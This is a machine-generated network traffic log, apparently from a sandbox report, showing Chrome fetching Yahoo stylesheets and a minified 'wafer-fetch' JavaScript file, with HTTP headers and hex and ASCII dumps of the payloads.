                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 73 6c 69 64 65 55 70 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 32 30 30 25 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 61 64 68 69 64 65 7b 30 25 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 74 6f 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 68 6f 77 2d 73 75 63 63 65 73 73 2d 6d 65 73 73 61 67 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 70 78 29 7d 38 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 6f 70 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: @keyframes slideUp{0%{transform:translateY(200%)}to{transform:translateY(0)}}@keyframes adhide{0%{visibility:visible}to{visibility:hidden}}@keyframes show-success-message{0%{opacity:0;transform:translateY(10px)}80%{opacity:1;transform:translateY(0)}to{opa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 3a 66 61 6c 6c 62 61 63 6b 7d 2e 63 61 61 73 7b 66 6f 6e 74 3a 31 33 70 78 2f 31 2e 36 22 59 61 68 6f 6f 53 61 6e 73 20 56 46 22 2c 59 61 68 6f 6f 20 53 61 6e 73 2c 59 61 68 6f 6f 53 61 6e 73 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 64 69 73 70 6c 61 79 3a 66 6c 6f 77 2d 72 6f 6f 74 3b 7a 6f 6f 6d 3a 31 7d 2e 63 61 61 73 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 36 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 6e 6f 72 6d 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :fallback}.caas{font:13px/1.6"YahooSans VF",Yahoo Sans,YahooSans,"Helvetica Neue",Helvetica,Arial,sans-serif;background:#fff;word-wrap:break-word;display:flow-root;zoom:1}.caas h1{font-size:2.46em;line-height:1.25;margin:0;color:#232a31;font-stretch:norma
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 69 6e 3a 34 30 70 78 20 30 3b 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 7d 2e 63 61 61 73 2d 61 64 73 2d 73 6c 6f 74 2d 72 61 70 69 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2a 63 6c 69 70 3a 72 65 63 74 28 31 70 78 20 31 70 78 20 31 70 78 20 31 70 78 29 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 31 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 61 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: in:40px 0;color:#e0e4e9}.caas-ads-slot-rapid{text-decoration:none;pointer-events:none;position:absolute!important;*clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);padding:0!important;border:0!important;height:1px!important;width:1px!important}.caas
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 20 2e 63 61 61 73 2d 74 6f 63 2d 73 75 62 68 65 61 64 69 6e 67 2d 6c 69 6e 6b 2e 61 63 74 69 76 65 2c 2e 63 61 61 73 20 2e 63 61 61 73 2d 74 6f 63 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 61 73 2d 74 6f 63 2d 73 75 62 68 65 61 64 69 6e 67 2d 6c 69 6e 6b 2e 6e 6f 2d 68 65 61 64 69 6e 67 7b 6f 70 61 63 69 74 79 3a 31 30 30 25 7d 2e 63 61 61 73 20 2e 63 61 61 73 2d 74 6f 63 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 61 73 2d 74 6f 63 2d 68 65 61 64 69 6e 67 2d 6c 69 6e 6b 2e 61 63 74 69 76 65 3a 3a 62 65 66 6f 72 65 2c 2e 63 61 61 73 20 2e 63 61 61 73 2d 74 6f 63 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 61 73 2d 74 6f 63 2d 73 75 62 68 65 61 64 69 6e 67 2d 6c 69 6e 6b 2e 61 63 74 69 76 65 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .caas-toc-subheading-link.active,.caas .caas-toc-container .caas-toc-subheading-link.no-heading{opacity:100%}.caas .caas-toc-container .caas-toc-heading-link.active::before,.caas .caas-toc-container .caas-toc-subheading-link.active::before{content:"";pos
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 29 7b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 63 61 61 73 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 2c 61 2e 63 61 61 73 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 7b 6f 75 74 6c 69 6e 65 3a 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 33 61 62 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 61 62 63 7d 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6e 6f 62 6f 72 64 65 72 2c 61 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6e 6f 62 6f 72 64 65 72 7b 62 6f 72 64 65 72 3a 30 7d 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6e 6f 62 6f 72 64 65 72 3a 6e 6f 74 28 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 29 2c 61 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6e 6f 62 6f 72 64 65 72 3a 6e 6f 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :focus-visible){outline:0}.caas-button:active,a.caas-button:active{outline:0;text-decoration:none;color:#003abc;border-color:#003abc}.caas-button.noborder,a.caas-button.noborder{border:0}.caas-button.noborder:not(:focus-visible),a.caas-button.noborder:not
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 63 61 61 73 2d 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 3a 6e 6f 74 28 2e 6e 6f 68 65 69 67 68 74 29 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 7d 2e 63 61 61 73 2d 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6e 6f 68 65 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 61 61 73 2d 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6e 6f 68 65 69 67 68 74 20 2e 63 61 61 73 2d 69 6d 67 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 7d 2e 63 61 61 73 2d 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 61 61 73 2d 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: elative;overflow:hidden}.caas-img-container:not(.noheight) img{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%)}.caas-img-container.noheight{text-align:center}.caas-img-container.noheight .caas-img{min-width:1px}.caas-img-container.caas-i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 30 29 7d 2e 63 61 61 73 2d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 2e 63 61 61 73 2d 61 74 74 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 63 61 61 73 2d 61 74 74 72 2e 61 75 74 68 6f 72 20 2e 63 61 61 73 2d 61 74 74 72 2d 6c 6f 67 6f 20 2e 63 61 61 73 2d 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 38 25 7d 2e 63 61 61 73 2d 61 74 74 72 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0;transform:translate(-50%,0)}.caas-img{border:0;max-width:100%;min-height:1px}.caas-attr{margin-bottom:10px;display:flex;flex-direction:row;align-items:center}.caas-attr.author .caas-attr-logo .caas-img{border-radius:48%}.caas-attr a{text-decoration:none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 72 61 74 6f 72 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 63 68 69 6c 64 29 3a 62 65 66 6f 72 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 34 36 32 72 65 6d 3b 63 6f 6e 74 65 6e 74 3a 22 20 e2 97 8f 22 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 34 72 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 63 61 61 73 2d 61 74 74 72 2d 70 72 6f 76 69 64 65 72 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 63 61 61 73 2d 61 74 74 72 2d 69 74 65 6d 2d 61 75 74 68 6f 72 73 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 33 7d 2e 63 61 61 73 2d 61 74 74 72 2d 69 74 65 6d 2d 61 75 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rator:not(:first-child):before{font-size:.462rem;content:" ";line-height:1.154rem;padding-right:5px;vertical-align:middle}.caas-attr-provider{padding-right:5px}.caas-attr-item-authors{position:relative;display:block;line-height:1.43}.caas-attr-item-aut
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 2d 63 61 70 74 69 6f 6e 20 2e 63 6f 6c 6c 61 70 73 65 64 20 2e 65 78 70 61 6e 64 2d 62 75 74 74 6f 6e 2e 63 6f 6c 6c 61 70 73 65 64 3a 62 65 66 6f 72 65 2c 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 2d 63 61 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 64 20 2e 65 78 70 61 6e 64 2d 62 75 74 74 6f 6e 2e 63 6f 6c 6c 61 70 73 65 64 3a 62 65 66 6f 72 65 2c 2e 63 61 61 73 2d 66 69 67 75 72 65 20 2e 63 61 70 74 69 6f 6e 2d 63 6f 6c 6c 61 70 73 65 2e 63 6f 6c 6c 61 70 73 65 64 20 2e 65 78 70 61 6e 64 2d 62 75 74 74 6f 6e 2e 63 6f 6c 6c 61 70 73 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ound-color:#fff}.caas-carousel .description.collapse-caption .collapsed .expand-button.collapsed:before,.caas-carousel .description.collapse-caption.collapsed .expand-button.collapsed:before,.caas-figure .caption-collapse.collapsed .expand-button.collapse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 2e 79 76 70 2d 64 6f 63 6b 65 64 2d 6d 6f 64 65 20 2e 79 76 70 2d 62 6f 74 74 6f 6d 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 79 76 70 2d 6d 65 6e 75 2d 63 6f 6e 74 72 6f 6c 73 20 2e 79 76 70 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 62 74 6e 2c 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 79 76 69 64 65 6f 3a 6e 6f 74 28 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 66 75 6c 6c 2d 64 6f 63 6b 29 20 2e 79 76 70 2d 64 6f 63 6b 65 64 2d 6d 6f 64 65 20 2e 79 76 70 2d 62 6f 74 74 6f 6d 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 79 76 70 2d 6d 65 6e 75 2d 63 6f 6e 74 72 6f 6c 73 20 2e 79 76 70 2d 6d 75 6c 74 69 61 75 64 69 6f 2d 62 74 6e 2c 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 79 76 69 64 65 6f 3a 6e 6f 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .yvp-docked-mode .yvp-bottom-container .yvp-menu-controls .yvp-fullscreen-btn,.caas-yvideo-wrapper .caas-yvideo:not(.caas-yvideo-full-dock) .yvp-docked-mode .yvp-bottom-container .yvp-menu-controls .yvp-multiaudio-btn,.caas-yvideo-wrapper .caas-yvideo:not


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    109192.168.2.44987287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC539OUTGET /aaq/wf/wf-fetch-1.19.1-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: P04FKrzARSSte7M5286EStdYYhuMt7iMVkWVNOB66ZuOTf+gULzOIUTh2YsiDcTuBIUU6YcsolXkeYQ3/a/YltxjLzqt/3FeuKeSKiO1yLg=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: NRFC9KW9MCGPRQH7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 15:18:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 20 Oct 2023 09:18:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "f085d6c42acb1394e457e463230de8ba"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: XcyEKreDz4JYLdlgGq65LAHV5Dsub3V6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 16798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 7328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 66 65 74 63 68 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 66 65 74 63 68 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-fetch",[],t):"object"==typeof exports?exports["wafer-fetch"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ction"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Objec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 6c 6c 79 7b 69 66 28 69 29 74 68 72 6f 77 20 61 7d 7d 72 65 74 75 72 6e 20 72 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 20 74 3b 69 66 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 4f 62 6a 65 63 74 28 74 29 29 72 65 74 75 72 6e 20 65 28 74 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: lly{if(i)throw a}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),h=function(){function e(e,t){for(var r=0;r<t.length;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 2e 75 72 6c 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 75 72 6c 22 29 2c 68 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 62 6f 75 6e 64 61 72 79 22 29 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 22 29 2c 79 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 72 65 64 65 6e 74 69 61 6c 73 22 29 2c 76 3d 63 2e 5f 75 74 69 6c 2e 63 61 63 68 65 4b 65 79 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 6b 65 79 22 29 2c 6d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 73 74 72 61 74 65 67 79 22 29 7c 7c 22 6e 65 74 77 6f 72 6b 46 69 72 73 74 22 2c 70 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 74 74 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .url||e.getAttribute(b+"url"),h=e.getAttribute(b+"boundary"),d=e.getAttribute(b+"cache"),y=e.getAttribute(b+"credentials"),v=c._util.cacheKey||e.getAttribute(b+"cache-key"),m=e.getAttribute(b+"cache-strategy")||"networkFirst",p=e.getAttribute(b+"cache-ttl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 2c 56 3d 6e 75 6c 6c 29 2c 22 73 74 61 74 65 43 68 61 6e 67 65 22 21 3d 3d 58 7c 7c 48 7c 7c 28 48 3d 30 29 2c 30 21 3d 3d 59 29 73 77 69 74 63 68 28 58 29 7b 63 61 73 65 22 69 6e 74 65 72 76 61 6c 22 3a 63 61 73 65 22 6f 6e 4c 6f 61 64 22 3a 63 61 73 65 22 73 74 61 74 65 43 68 61 6e 67 65 22 3a 63 61 73 65 22 76 69 65 77 70 6f 72 74 22 3a 59 3d 32 7d 69 66 28 22 61 63 74 69 76 61 74 65 22 21 3d 3d 58 26 26 22 65 61 63 68 43 6c 69 63 6b 22 21 3d 3d 58 26 26 22 69 6e 74 65 72 76 61 6c 22 21 3d 3d 58 26 26 22 73 74 61 74 65 43 68 61 6e 67 65 22 21 3d 3d 58 26 26 22 74 61 62 41 63 74 69 76 61 74 65 22 21 3d 3d 58 7c 7c 28 7a 3d 21 30 29 2c 21 4b 29 7b 76 61 72 20 4a 3d 5f 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,V=null),"stateChange"!==X||H||(H=0),0!==Y)switch(X){case"interval":case"onLoad":case"stateChange":case"viewport":Y=2}if("activate"!==X&&"eachClick"!==X&&"interval"!==X&&"stateChange"!==X&&"tabActivate"!==X||(z=!0),!K){var J=_(e.getElementsByClassName("fe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC912INData Raw: 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 58 3f 28 63 2e 5f 75 74 69 6c 2e 68 61 73 4d 6f 75 73 65 65 6e 74 65 72 3d 21 30 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 29 3a 22 74 61 62 41 63 74 69 76 61 74 65 22 3d 3d 3d 58 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 77 66 2d 74 72 69 67 67 65 72 2d 61 63 74 69 76 61 74 65 64 22 29 26 26 21 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 3f 63 2e 66 65 74 63 68 28 29 3a 22 6f 6e 4c 6f 61 64 22 3d 3d 3d 58 26 26 63 2e 66 65 74 63 68 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 63 2e 64 65 73 74 72 6f 79 28 29 7d 29 2c 63 7d 72 65 74 75 72 6e 20 6f 28 74 2c 65 29 2c 68 28 74 2c 5b 7b 6b 65 79 3a 22 66 65 74 63 68 44
